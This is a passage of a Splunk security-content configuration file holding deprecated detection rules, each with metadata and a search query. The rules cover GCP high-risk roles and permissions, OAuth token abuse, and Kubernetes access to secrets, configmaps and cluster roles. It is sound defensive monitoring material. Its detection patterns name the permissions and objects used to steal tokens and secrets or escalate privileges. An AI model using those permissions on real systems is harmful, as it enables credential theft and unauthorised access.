`security_content_ctime(lastTime)` | search [| tstats `security_content_summariesonly` earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = cmd.exe Processes.process = "* /c *" by Processes.process | `drop_dm_object_name(Processes)` | inputlookup append=t previously_seen_cmd_line_arguments | stats min(firstTime) as firstTime, max(lastTime) as lastTime by process | outputlookup previously_seen_cmd_line_arguments | eval newCmdLineArgument=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newCmdLineArgument=1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table process] | `first_time_seen_command_line_argument_filter`

[ESCU - GCP Detect accounts with high risk roles by project - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides detection of accounts with high risk roles by project. Compromised accounts with high risk roles can move laterally or even escalate privileges across projects, depending on the organization's structure.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]}
action.escu.data_models = ["Email"]
action.escu.eli5 = This search provides detection of accounts with high risk roles by project. Compromised accounts with high risk roles can move laterally or even escalate privileges across projects, depending on the organization's structure.
action.escu.how_to_implement = You must install the Splunk GCP add-on. \
This search works with gcp:pubsub:message logs action.escu.known_false_positives = Accounts with high risk roles should be reduced to the minimum number needed, however specific tasks and setups may be simply expected behavior within organization action.escu.creation_date = 2020-10-09 action.escu.modification_date = 2020-10-09 action.escu.confidence = high action.escu.full_search_name = ESCU - GCP Detect accounts with high risk roles by project - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["GCP Cross Account Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - GCP Detect accounts with high risk roles by project - Rule action.correlationsearch.annotations = {"analytic_story": ["GCP Cross Account Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `google_gcp_pubsub_message` data.protoPayload.request.policy.bindings{}.role=roles/owner OR roles/editor OR roles/iam.serviceAccountUser OR roles/iam.serviceAccountAdmin OR roles/iam.serviceAccountTokenCreator OR roles/dataflow.developer OR roles/dataflow.admin OR roles/composer.admin OR roles/dataproc.admin OR roles/dataproc.editor | table data.resource.type data.protoPayload.authenticationInfo.principalEmail data.protoPayload.authorizationInfo{}.permission data.protoPayload.authorizationInfo{}.resource data.protoPayload.response.bindings{}.role 
data.protoPayload.response.bindings{}.members{} | `gcp_detect_accounts_with_high_risk_roles_by_project_filter` [ESCU - GCP Detect high risk permissions by resource and account - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides detection of high risk permissions by resource and accounts. These are permissions that can allow attackers with compromised accounts to move laterally and escalate privileges. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = ["Email"] action.escu.eli5 = This search provides detection of high risk permissions by resource and accounts. These are permissions that can allow attackers with compromised accounts to move laterally and escalate privileges. action.escu.how_to_implement = You must install splunk GCP add-on. This search works with gcp:pubsub:message logs action.escu.known_false_positives = High risk permissions are part of any GCP environment, however it is important to track resource and accounts usage, this search may produce false positives. 
action.escu.creation_date = 2020-10-09 action.escu.modification_date = 2020-10-09 action.escu.confidence = high action.escu.full_search_name = ESCU - GCP Detect high risk permissions by resource and account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["GCP Cross Account Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - GCP Detect high risk permissions by resource and account - Rule action.correlationsearch.annotations = {"analytic_story": ["GCP Cross Account Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `google_gcp_pubsub_message` data.protoPayload.authorizationInfo{}.permission=iam.serviceAccounts.getaccesstoken OR iam.serviceAccounts.setIamPolicy OR iam.serviceAccounts.actas OR dataflow.jobs.create OR composer.environments.create OR dataproc.clusters.create |table data.protoPayload.requestMetadata.callerIp data.protoPayload.authenticationInfo.principalEmail data.protoPayload.authorizationInfo{}.permission data.protoPayload.response.bindings{}.members{} data.resource.labels.project_id | `gcp_detect_high_risk_permissions_by_resource_and_account_filter` [ESCU - gcp detect oauth token abuse - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. 
This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides detection of possible GCP Oauth token abuse. GCP Oauth token without time limit can be exfiltrated and reused for keeping access sessions alive without further control of authentication, allowing attackers to access and move laterally. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides detection of possible GCP Oauth token abuse. GCP Oauth token without time limit can be exfiltrated and reused for keeping access sessions alive without further control of authentication, allowing attackers to access and move laterally. action.escu.how_to_implement = You must install splunk GCP add-on. This search works with gcp:pubsub:message logs action.escu.known_false_positives = GCP Oauth token abuse detection will only work if there are access policies in place along with audit logs. 
action.escu.creation_date = 2020-09-01 action.escu.modification_date = 2020-09-01 action.escu.confidence = high action.escu.full_search_name = ESCU - gcp detect oauth token abuse - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["GCP Cross Account Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - gcp detect oauth token abuse - Rule action.correlationsearch.annotations = {"analytic_story": ["GCP Cross Account Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `google_gcp_pubsub_message` type.googleapis.com/google.cloud.audit.AuditLog |table protoPayload.@type protoPayload.status.details{}.@type protoPayload.status.details{}.violations{}.callerIp protoPayload.status.details{}.violations{}.type protoPayload.status.message | `gcp_detect_oauth_token_abuse_filter` [ESCU - GCP Kubernetes cluster scan detection - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. 
This search provides information of unauthenticated requests via user agent, and authentication data against Kubernetes cluster action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.CM"]} action.escu.data_models = ["Email"] action.escu.eli5 = This search provides information of unauthenticated requests via user agent, and authentication data against Kubernetes cluster action.escu.how_to_implement = You must install the GCP App for Splunk (version 2.0.0 or later), then configure stackdriver and set a Pub/Sub subscription to be imported to Splunk. You must also install Cloud Infrastructure data model.Customize the macro kubernetes_gcp_scan_fingerprint_attack_detection to filter out FPs. action.escu.known_false_positives = Not all unauthenticated requests are malicious, but frequency, User Agent and source IPs will provide context. action.escu.creation_date = 2020-04-15 action.escu.modification_date = 2020-04-15 action.escu.confidence = high action.escu.full_search_name = ESCU - GCP Kubernetes cluster scan detection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["Kubernetes Scanning Activity"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - GCP Kubernetes cluster scan detection - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Scanning Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": 
["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search provides information of unauthenticated requests via user agent, and authentication data against Kubernetes cluster action.notable.param.rule_title = GCP Kubernetes cluster scan detection action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `google_gcp_pubsub_message` data.protoPayload.requestMetadata.callerIp!=127.0.0.1 data.protoPayload.requestMetadata.callerIp!=::1 "data.labels.authorization.k8s.io/decision"=forbid "data.protoPayload.status.message"=PERMISSION_DENIED data.protoPayload.authenticationInfo.principalEmail="system:anonymous" | rename data.protoPayload.requestMetadata.callerIp as src_ip | stats count min(_time) as firstTime max(_time) as lastTime values(data.protoPayload.methodName) as method_name values(data.protoPayload.resourceName) as resource_name values(data.protoPayload.requestMetadata.callerSuppliedUserAgent) as http_user_agent by src_ip data.resource.labels.cluster_name | rename data.resource.labels.cluster_name as cluster_name| `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `gcp_kubernetes_cluster_scan_detection_filter` [ESCU - Identify New User Accounts - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. 
This detection search will help profile user accounts in your environment by identifying newly created accounts that have been added to your network in the past week. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection search will help profile user accounts in your environment by identifying newly created accounts that have been added to your network in the past week. action.escu.how_to_implement = To successfully implement this search, you need to be populating the Enterprise Security Identity_Management data model in the assets and identity framework. action.escu.known_false_positives = If the Identity_Management data model is not updated regularly, this search could give you false positive alerts. Please consider this and investigate appropriately. action.escu.creation_date = 2017-09-12 action.escu.modification_date = 2017-09-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Identify New User Accounts - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Account Monitoring and Controls"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Identify New User Accounts - Rule action.correlationsearch.annotations = {"analytic_story": ["Account Monitoring and Controls"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 
realtime_schedule = 0 is_visible = false search = | from datamodel Identity_Management.All_Identities | eval empStatus=case((now()-startDate)<604800, "Accounts created in last week") | search empStatus="Accounts created in last week"| `security_content_ctime(endDate)` | `security_content_ctime(startDate)`| table identity empStatus endDate startDate | `identify_new_user_accounts_filter` [ESCU - Kubernetes AWS detect most active service accounts by pod - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes service accounts,accessing pods by IP address, verb and decision action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes service accounts,accessing pods by IP address, verb and decision action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with cloudwatch logs action.escu.known_false_positives = Not all service accounts interactions are malicious. Analyst must consider IP, verb and decision context when trying to detect maliciousness. 
action.escu.creation_date = 2020-06-23 action.escu.modification_date = 2020-06-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes AWS detect most active service accounts by pod - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Role Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes AWS detect most active service accounts by pod - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Role Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_cloudwatchlogs_eks` user.groups{}=system:serviceaccounts objectRef.resource=pods | table sourceIPs{} user.username userAgent verb annotations.authorization.k8s.io/decision | top sourceIPs{} user.username verb annotations.authorization.k8s.io/decision |`kubernetes_aws_detect_most_active_service_accounts_by_pod_filter` [ESCU - Kubernetes AWS detect RBAC authorization by account - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. 
This search provides information on Kubernetes RBAC authorizations by accounts, this search can be modified by adding top to see both extremes of RBAC by accounts occurrences action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes RBAC authorizations by accounts, this search can be modified by adding top to see both extremes of RBAC by accounts occurrences action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with cloudwatch logs action.escu.known_false_positives = Not all RBAC Authorications are malicious. RBAC authorizations can uncover malicious activity specially if sensitive Roles have been granted. action.escu.creation_date = 2020-06-23 action.escu.modification_date = 2020-06-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes AWS detect RBAC authorization by account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Role Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes AWS detect RBAC authorization by account - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Role Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_cloudwatchlogs_eks` annotations.authorization.k8s.io/reason=* | table sourceIPs{} user.username userAgent annotations.authorization.k8s.io/reason | 
stats count by user.username annotations.authorization.k8s.io/reason | rare user.username annotations.authorization.k8s.io/reason |`kubernetes_aws_detect_rbac_authorization_by_account_filter` [ESCU - Kubernetes AWS detect sensitive role access - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes accounts accessing sensitve objects such as configmpas or secrets action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes accounts accessing sensitve objects such as configmpas or secrets action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with cloudwatch logs. action.escu.known_false_positives = Sensitive role resource access is necessary for cluster operation, however source IP, namespace and user group may indicate possible malicious use. 
action.escu.creation_date = 2020-06-23 action.escu.modification_date = 2020-06-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes AWS detect sensitive role access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Role Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes AWS detect sensitive role access - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Role Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_cloudwatchlogs_eks` objectRef.resource=clusterroles OR clusterrolebindings sourceIPs{}!=::1 sourceIPs{}!=127.0.0.1 | table sourceIPs{} user.username user.groups{} objectRef.namespace requestURI annotations.authorization.k8s.io/reason | dedup user.username user.groups{} |`kubernetes_aws_detect_sensitive_role_access_filter` [ESCU - Kubernetes AWS detect service accounts forbidden failure access - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. 
This search provides information on Kubernetes service accounts with failure or forbidden access status, this search can be extended by using top or rare operators to find trends or rarities in failure status, user agents, source IPs and request URI action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes service accounts with failure or forbidden access status, this search can be extended by using top or rare operators to find trends or rarities in failure status, user agents, source IPs and request URI action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with cloudwatch logs. action.escu.known_false_positives = This search can give false positives as there might be inherent issues with authentications and permissions at cluster. action.escu.creation_date = 2020-06-23 action.escu.modification_date = 2020-06-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes AWS detect service accounts forbidden failure access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Object Access Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes AWS detect service accounts forbidden failure access - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Object Access Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = 
false search = `aws_cloudwatchlogs_eks` user.groups{}=system:serviceaccounts responseStatus.status = Failure | table sourceIPs{} user.username userAgent verb responseStatus.status requestURI | `kubernetes_aws_detect_service_accounts_forbidden_failure_access_filter` [ESCU - Kubernetes Azure active service accounts by pod namespace - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes service accounts,accessing pods and namespaces by IP address and verb action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes service accounts,accessing pods and namespaces by IP address and verb action.escu.how_to_implement = You must install the Add-on for Microsoft Cloud Services and Configure Kube-Audit data diagnostics action.escu.known_false_positives = Not all service accounts interactions are malicious. Analyst must consider IP and verb context when trying to detect maliciousness. 
action.escu.creation_date = 2020-05-26 action.escu.modification_date = 2020-05-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Azure active service accounts by pod namespace - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Role Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes Azure active service accounts by pod namespace - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Role Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kubernetes_azure` category=kube-audit | spath input=properties.log | search user.groups{}=system:serviceaccounts* OR user.username=system.anonymous OR annotations.authorization.k8s.io/decision=allow | table sourceIPs{} user.username userAgent verb responseStatus.reason responseStatus.status properties.pod objectRef.namespace | top sourceIPs{} user.username verb responseStatus.status properties.pod objectRef.namespace |`kubernetes_azure_active_service_accounts_by_pod_namespace_filter` [ESCU - Kubernetes Azure detect RBAC authorization by account - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. 
This search provides information on Kubernetes RBAC authorizations by accounts, this search can be modified by adding rare or top to see both extremes of RBAC by accounts occurrences action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes RBAC authorizations by accounts, this search can be modified by adding rare or top to see both extremes of RBAC by accounts occurrences action.escu.how_to_implement = You must install the Add-on for Microsoft Cloud Services and Configure Kube-Audit data diagnostics action.escu.known_false_positives = Not all RBAC Authorications are malicious. RBAC authorizations can uncover malicious activity specially if sensitive Roles have been granted. action.escu.creation_date = 2020-05-26 action.escu.modification_date = 2020-05-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Kubernetes Azure detect RBAC authorization by account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Kubernetes"] action.escu.analytic_story = ["Kubernetes Sensitive Role Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Kubernetes Azure detect RBAC authorization by account - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Role Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `kubernetes_azure` category=kube-audit | spath input=properties.log | search annotations.authorization.k8s.io/reason=* | table 
sourceIPs{} user.username userAgent annotations.authorization.k8s.io/reason |stats count by user.username annotations.authorization.k8s.io/reason | rare user.username annotations.authorization.k8s.io/reason |`kubernetes_azure_detect_rbac_authorization_by_account_filter`

[ESCU - Kubernetes Azure detect sensitive object access - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes accounts accessing sensitive objects such as configmaps or secrets
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search provides information on Kubernetes accounts accessing sensitive objects such as configmaps or secrets
action.escu.how_to_implement = You must install the Add-on for Microsoft Cloud Services and configure Kube-Audit data diagnostics
action.escu.known_false_positives = Sensitive object access is not necessarily malicious but user and object context can provide guidance for detection.
action.escu.creation_date = 2020-05-20
action.escu.modification_date = 2020-05-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes Azure detect sensitive object access - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Kubernetes Sensitive Object Access Activity"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Kubernetes Azure detect sensitive object access - Rule
action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Object Access Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `kubernetes_azure` category=kube-audit | spath input=properties.log| search objectRef.resource=secrets OR configmaps user.username=system.anonymous OR annotations.authorization.k8s.io/decision=allow |table user.username user.groups{} objectRef.resource objectRef.namespace objectRef.name annotations.authorization.k8s.io/reason |dedup user.username user.groups{} |`kubernetes_azure_detect_sensitive_object_access_filter`

[ESCU - Kubernetes Azure detect sensitive role access - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes accounts accessing sensitive objects such as configmaps or secrets
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search provides information on Kubernetes accounts accessing sensitive objects such as configmaps or secrets
action.escu.how_to_implement = You must install the Add-on for Microsoft Cloud Services and configure Kube-Audit data diagnostics
action.escu.known_false_positives = Sensitive role resource access is necessary for cluster operation; however, source IP, namespace and user group may indicate possible malicious use.
action.escu.creation_date = 2020-05-20
action.escu.modification_date = 2020-05-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes Azure detect sensitive role access - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Kubernetes Sensitive Role Activity"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Kubernetes Azure detect sensitive role access - Rule
action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Role Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `kubernetes_azure` category=kube-audit | spath input=properties.log| search objectRef.resource=clusterroles OR clusterrolebindings | table sourceIPs{} user.username user.groups{} objectRef.namespace requestURI annotations.authorization.k8s.io/reason | dedup user.username user.groups{} |`kubernetes_azure_detect_sensitive_role_access_filter`

[ESCU - Kubernetes Azure detect service accounts forbidden failure access - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes service accounts with failure or forbidden access status
action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search provides information on Kubernetes service accounts with failure or forbidden access status
action.escu.how_to_implement = You must install the Add-on for Microsoft Cloud Services and configure Kube-Audit data diagnostics
action.escu.known_false_positives = This search can give false positives as there might be inherent issues with authentication and permissions in the cluster.
action.escu.creation_date = 2020-05-20
action.escu.modification_date = 2020-05-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Kubernetes Azure detect service accounts forbidden failure access - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Kubernetes"]
action.escu.analytic_story = ["Kubernetes Sensitive Object Access Activity"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Deprecated - Kubernetes Azure detect service accounts forbidden failure access - Rule
